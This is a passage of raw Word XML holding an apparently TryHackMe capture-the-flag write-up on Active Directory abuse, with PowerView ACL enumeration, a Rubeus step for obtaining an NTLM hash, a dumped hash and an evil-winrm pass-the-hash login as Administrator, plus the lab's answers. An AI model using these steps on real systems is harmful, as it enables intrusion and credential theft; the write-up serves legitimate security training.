          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    CredentialData       :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D5207E" w14:textId="77777777" w:rsidR="006B3814" w:rsidRPr="006B3814" w:rsidRDefault="006B3814" w:rsidP="006B3814">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B3814">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">      CredentialCount    : 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684C2FC7" w14:textId="77777777" w:rsidR="006B3814" w:rsidRPr="00361DF4" w:rsidRDefault="006B3814" w:rsidP="006B3814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6B3814">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="00361DF4">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>NTLM              : F138C405BD9F3139994E220CE0212E7C</w:t>
      </w:r>
      <w:r w:rsidRPr="00361DF4">
        <w:rPr>
          <w:rStyle w:val="token"/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4D1C515" w14:textId="77777777" w:rsidR="006B3814" w:rsidRPr="006B3814" w:rsidRDefault="006B3814" w:rsidP="00D91F5E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E84D1AF" w14:textId="46404DC0" w:rsidR="00502683" w:rsidRDefault="006B3814" w:rsidP="00D91F5E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>The NTLM part is what you want. This can then be passed into Evil-WinRM</w:t>
      </w:r>
      <w:r w:rsidR="004D254E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> to remotely access the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7FB6B5" w14:textId="1BA87502" w:rsidR="00B539B6" w:rsidRPr="006B3814" w:rsidRDefault="00B539B6" w:rsidP="00D91F5E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB6CCF">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="004E6883">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">evil-winrm -i 10.10.51.105 -u </w:t>
      </w:r>
      <w:r w:rsidR="004E6883" w:rsidRPr="004E6883">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrator -H </w:t>
      </w:r>
      <w:r w:rsidR="004E6883" w:rsidRPr="004E6883">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>F138C405BD9F3139994E220CE0212E7C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5576F98E" w14:textId="77777777" w:rsidR="00502683" w:rsidRDefault="00502683" w:rsidP="00D91F5E"/>
    <w:p w14:paraId="3ED88312" w14:textId="77777777" w:rsidR="00502683" w:rsidRDefault="00502683" w:rsidP="00D91F5E"/>
    <w:p w14:paraId="2D2DA72D" w14:textId="77777777" w:rsidR="00502683" w:rsidRDefault="00502683" w:rsidP="00D91F5E"/>
    <w:p w14:paraId="61EBB28A" w14:textId="77777777" w:rsidR="00D07817" w:rsidRDefault="00D07817" w:rsidP="00D91F5E"/>
    <w:p w14:paraId="204FB554" w14:textId="0FF54FFA" w:rsidR="00502683" w:rsidRPr="0001186C" w:rsidRDefault="00502683" w:rsidP="00D91F5E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0001186C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Question 1) What is the has of the vulnerable user</w:t>
      </w:r>
      <w:r w:rsidR="00E6724B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and w</w:t>
      </w:r>
      <w:r w:rsidR="00E6724B" w:rsidRPr="0001186C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hat is the content of flag.txt on the Administrator Desktop?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765EC94F" w14:textId="22C6B67B" w:rsidR="0001186C" w:rsidRDefault="00D07817" w:rsidP="00D91F5E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="21A589DB" wp14:editId="60A61881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3647619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35" y="19505"/>
                <wp:lineTo x="21435" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="141407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72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B01CF" w14:textId="54520C30" w:rsidR="00D07817" w:rsidRDefault="00D07817" w:rsidP="00D91F5E">
      <w:r>
        <w:t>First you want to import the PowerView powershell script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAA6681" w14:textId="6AAA6FD1" w:rsidR="008948B7" w:rsidRDefault="00A61AAE" w:rsidP="00D91F5E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="116D58B2" wp14:editId="279091B9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>194202</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6928433" cy="201881"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20442"/>
                <wp:lineTo x="21501" y="20442"/>
                <wp:lineTo x="21501" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="80036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63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8433" cy="20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5F3">
        <w:t>Then you want to run this command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2809025A" w14:textId="4E7B1084" w:rsidR="00D07817" w:rsidRPr="00085AB0" w:rsidRDefault="00D504FA" w:rsidP="00D91F5E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48F8D7" wp14:editId="62357636">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>598623</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="471805"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20931"/>
                <wp:lineTo x="21538" y="20931"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="207576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64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AAC" w:rsidRPr="00080AF0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command</w:t>
      </w:r>
      <w:r w:rsidR="00397AAC" w:rsidRPr="00080AF0">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00397AAC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00085AB0" w:rsidRPr="00085AB0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Find-InterestingDomainAcl -ResolveGuids | Where-Object { $_.IdentityReferenceName -eq "hr" } | Select-Object IdentityReferenceName, ObjectDN, ActiveDirectoryRights</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B48FFE3" w14:textId="78B2B75C" w:rsidR="00D07817" w:rsidRDefault="00D504FA" w:rsidP="00D91F5E">
      <w:r>
        <w:t>The result was the user ‘hr’</w:t>
      </w:r>
      <w:r w:rsidR="00150D5A">
        <w:t>, with the permission CN=vansprinkles, which means that the user has permission over CN attribute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E290DB" w14:textId="69BAC644" w:rsidR="00D07817" w:rsidRDefault="00FB59DC" w:rsidP="00D91F5E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="197152A5" wp14:editId="3D551DA2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>231783</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="1329055"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445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29021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13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F76">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4ADE3704" wp14:editId="5DD1CC56">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>11348</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4304762" cy="180952"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="18254"/>
                <wp:lineTo x="21412" y="18254"/>
                <wp:lineTo x="21412" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="173222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29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9297D" w14:textId="37F3125E" w:rsidR="00301F76" w:rsidRDefault="00BE07EE" w:rsidP="00D91F5E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="29283DBA" wp14:editId="07D4CDBC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1648460</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="1287780"/>
            <wp:effectExtent l="0" t="0" r="2540" b="762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157941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11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Rubeus</w:t>
      </w:r>
      <w:r w:rsidR="00D86692">
        <w:t>, to obtain the NTLM hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4722A562" w14:textId="493BAC6A" w:rsidR="00301F76" w:rsidRDefault="00B6563A" w:rsidP="00D91F5E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5792B6E6" wp14:editId="11524D7B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1540090</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2534920" cy="807085"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20903"/>
                <wp:lineTo x="21427" y="20903"/>
                <wp:lineTo x="21427" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="130098971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89714" name="Picture 1" descr="A blue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767">
        <w:t>The NTLM hash is the output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0C3E12" w14:textId="0FDA6AB0" w:rsidR="007E776B" w:rsidRDefault="007E776B" w:rsidP="00D91F5E"/>
    <w:p w14:paraId="13CF4ED9" w14:textId="23758F6C" w:rsidR="00301F76" w:rsidRDefault="00301F76" w:rsidP="00D91F5E"/>
    <w:p w14:paraId="16707AF9" w14:textId="77777777" w:rsidR="007E776B" w:rsidRDefault="007E776B" w:rsidP="00D91F5E"/>
    <w:p w14:paraId="6FED2384" w14:textId="79E4EBD8" w:rsidR="007E776B" w:rsidRDefault="00871F06" w:rsidP="00D91F5E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251675648" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3AD6799B" wp14:editId="60D2A93C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-5610</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>879023</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="391795"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21005"/>
                <wp:lineTo x="21538" y="21005"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="57422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20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BD4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="49456474" wp14:editId="59F0B399">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>196277</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="335280"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20864"/>
                <wp:lineTo x="21538" y="20864"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="120766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64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6B">
        <w:t>Then use remote desktop (evil-winRM) to gain access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B9610F" w14:textId="2081B762" w:rsidR="007E776B" w:rsidRDefault="00871F06" w:rsidP="00D91F5E">
      <w:r>
        <w:t>The flag is located on the Administrator Desktop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69631B7A" w14:textId="1CE2EA7C" w:rsidR="0001186C" w:rsidRDefault="0001186C" w:rsidP="00D91F5E">
      <w:r w:rsidRPr="00D74681">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Answer</w:t>
      </w:r>
      <w:r w:rsidR="00711660">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00CB5B2C" w:rsidRPr="00CB5B2C">
        <w:t>03E805D8A8C5AA435FB48832DAD620E3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4042FBED" w14:textId="5E64642A" w:rsidR="00681936" w:rsidRDefault="00681936" w:rsidP="00681936">
      <w:r w:rsidRPr="00D74681">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Answer</w:t>
      </w:r>
      <w:r w:rsidR="00711660">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00C26FE5">
        <w:t>THM{XMAS_IS_SAFE}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAC7CF8" w14:textId="77777777" w:rsidR="00681936" w:rsidRDefault="00681936" w:rsidP="00D91F5E"/>
    <w:p w14:paraId="7682A309" w14:textId="77777777" w:rsidR="00502683" w:rsidRDefault="00502683" w:rsidP="00D91F5E"/>
    <w:p w14:paraId="00C60520" w14:textId="77777777" w:rsidR="00D91F5E" w:rsidRPr="00D91F5E" w:rsidRDefault="00D91F5E" w:rsidP="00D91F5E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6955"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00D91F5E" w:rsidRPr="00D91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20B1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="33D4A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233AC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1D4E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4095A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0084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210070">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="49304733">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="16922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DB"/>
    <w:rsid w:val="0001186C"/>
    <w:rsid w:val="00072FD8"/>
    <w:rsid w:val="00080AF0"/>
    <w:rsid w:val="00085AB0"/>
    <w:rsid w:val="000B4ECD"/>
    <w:rsid w:val="000F2525"/>
    <w:rsid w:val="00117344"/>
    <w:rsid w:val="001312DE"/>
    <w:rsid w:val="00150D5A"/>
    <w:rsid w:val="00173343"/>
    <w:rsid w:val="001A7D79"/>
    <w:rsid w:val="001D5EDB"/>
    <w:rsid w:val="002902C6"/>
    <w:rsid w:val="002A2A2F"/>
    <w:rsid w:val="002A3350"/>
    <w:rsid w:val="002C6767"/>
    <w:rsid w:val="00301F76"/>
    <w:rsid w:val="00361DF4"/>
    <w:rsid w:val="00373DF6"/>
    <w:rsid w:val="00397AAC"/>
    <w:rsid w:val="003B3FCC"/>
    <w:rsid w:val="003E2FFE"/>
    <w:rsid w:val="00417FA9"/>
    <w:rsid w:val="00445983"/>
    <w:rsid w:val="00475FC8"/>
    <w:rsid w:val="004D254E"/>
    <w:rsid w:val="004E6883"/>
    <w:rsid w:val="00502683"/>
    <w:rsid w:val="005423F5"/>
    <w:rsid w:val="005B3BD8"/>
    <w:rsid w:val="005E1FF0"/>
    <w:rsid w:val="005F4051"/>
    <w:rsid w:val="00647BD4"/>
    <w:rsid w:val="0065462E"/>
    <w:rsid w:val="00681936"/>
    <w:rsid w:val="006B3814"/>
    <w:rsid w:val="006B4B5C"/>
    <w:rsid w:val="006E7B36"/>
    <w:rsid w:val="00711660"/>
    <w:rsid w:val="00743E70"/>
    <w:rsid w:val="00762437"/>
    <w:rsid w:val="007E776B"/>
    <w:rsid w:val="00833627"/>
    <w:rsid w:val="00871F06"/>
    <w:rsid w:val="008839AB"/>
    <w:rsid w:val="008948B7"/>
    <w:rsid w:val="008C2F9C"/>
    <w:rsid w:val="00914697"/>
    <w:rsid w:val="00976565"/>
    <w:rsid w:val="00A61AAE"/>
    <w:rsid w:val="00AC7534"/>
    <w:rsid w:val="00AF1B71"/>
    <w:rsid w:val="00B0236E"/>
    <w:rsid w:val="00B0576C"/>
    <w:rsid w:val="00B245BE"/>
    <w:rsid w:val="00B539B6"/>
    <w:rsid w:val="00B6563A"/>
    <w:rsid w:val="00BE07EE"/>
    <w:rsid w:val="00BE312F"/>
    <w:rsid w:val="00C173B3"/>
    <w:rsid w:val="00C21CC9"/>
    <w:rsid w:val="00C26FE5"/>
    <w:rsid w:val="00C47AB5"/>
    <w:rsid w:val="00CB5B2C"/>
    <w:rsid w:val="00CB6CCF"/>
    <w:rsid w:val="00CC306E"/>
    <w:rsid w:val="00D03C01"/>
    <w:rsid w:val="00D066B1"/>
    <w:rsid w:val="00D07817"/>
    <w:rsid w:val="00D504FA"/>
    <w:rsid w:val="00D74681"/>
    <w:rsid w:val="00D86692"/>
    <w:rsid w:val="00D91F5E"/>
    <w:rsid w:val="00DA7C97"/>
    <w:rsid w:val="00E137DB"/>
    <w:rsid w:val="00E6724B"/>
    <w:rsid w:val="00E76629"/>
    <w:rsid w:val="00E82D3E"/>
    <w:rsid w:val="00E937C5"/>
    <w:rsid w:val="00F13C6F"/>
    <w:rsid w:val="00F3099C"/>
    <w:rsid w:val="00F555F3"/>
    <w:rsid w:val="00F55B12"/>
    <w:rsid w:val="00F66984"/>
    <w:rsid w:val="00FB59DC"/>
    <w:rsid w:val="00F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C4B4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8F21AE8F-27BA-4E77-A84F-1F7D4F81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2F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3F5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token">
    <w:name w:val="token"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="005423F5"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00B0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105</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-12-31T08:44:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-01T14:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>